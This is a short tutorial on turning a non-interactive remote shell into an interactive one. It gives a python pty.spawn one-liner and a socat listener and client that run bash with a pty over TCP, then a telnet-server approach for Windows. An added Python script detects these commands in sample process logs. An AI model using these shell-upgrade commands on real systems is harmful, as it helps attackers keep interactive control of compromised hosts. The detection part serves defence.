From a non-interactive shell to an interactive one

As you can read at the end of this post, a remote shell obtained through command execution (for example -e cmd.exe or -e /bin/bash) isn't a fully interactive command prompt.
These are the solutions I found to get a more stable shell. Note that I don't cover web shells such as c99, c100, weevely or other PHP/ASP code that needs a web server. I also don't cover MSFvenom and similar tools; I focused on something closer to Netcat or SSH.

The target is a Linux system.
Using Python:
After you get a Netcat remote shell, execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is not completely interactive, but it is better than before.

It is better to use socat, which is a more complex variant of Netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a fully interactive remote shell.
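From the defender's side, the two Linux upgrade commands above leave a recognisable trace in process-execution logs. The following is an added example, not code from the original post: it scans constructed process log lines for the pty.spawn one-liner and the socat exec:...,pty client. The "pid user command" log format, the rules and the sample lines are my own assumptions.

```python
import re

# Constructed sample process-execution log lines (not from the original post),
# in a simplified "pid user command" format as a host agent might record them.
SAMPLE_LOG = """\
1201 www-data python -c 'import pty; pty.spawn("/bin/bash");'
1202 www-data socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane
1203 alice python3 /opt/app/report.py --daily
1204 bob socat - tcp:10.0.0.5:443
1205 www-data sh -c "python -c 'import pty;pty.spawn(\\"/bin/sh\\")'"
"""

# Each rule pairs a name with a regex over the command line.
# The first matches any python interpreter calling pty.spawn(); the second
# matches socat running a shell via exec: with a pty attached.
RULES = [
    ("python-pty-spawn",
     re.compile(r"python\d*(?:\.\d+)?\b.*\bpty\.spawn\(")),
    ("socat-exec-shell-pty",
     re.compile(r"\bsocat\b.*\bexec:\"?(?:/bin/|/usr/bin/)?(?:ba|z|da)?sh\b.*\bpty\b")),
]


def parse_line(line):
    """Split one 'pid user command' line; the command may contain spaces."""
    pid, user, cmd = line.split(" ", 2)
    return int(pid), user, cmd


def scan(log_text):
    """Return one hit per (line, rule) match, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        pid, user, cmd = parse_line(line)
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append({"pid": pid, "user": user, "rule": name, "cmd": cmd})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"[{hit['rule']}] pid={hit['pid']} user={hit['user']}: {hit['cmd']}")
```

Administrators do use socat and pty legitimately, so treat a hit as a hunt lead to be weighed against the user (a web-server account spawning a pty is far more suspicious than an interactive login) rather than as a verdict on its own.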

The target is a Windows system.
I assume that in a Microsoft environment you don't have Python or socat, although both programs have Windows binaries.
So the best way I found is to start a telnet server. Googling, I found some stand-alone programs like TelnetD. Note that it isn't free software, but you can try it using the trial version.
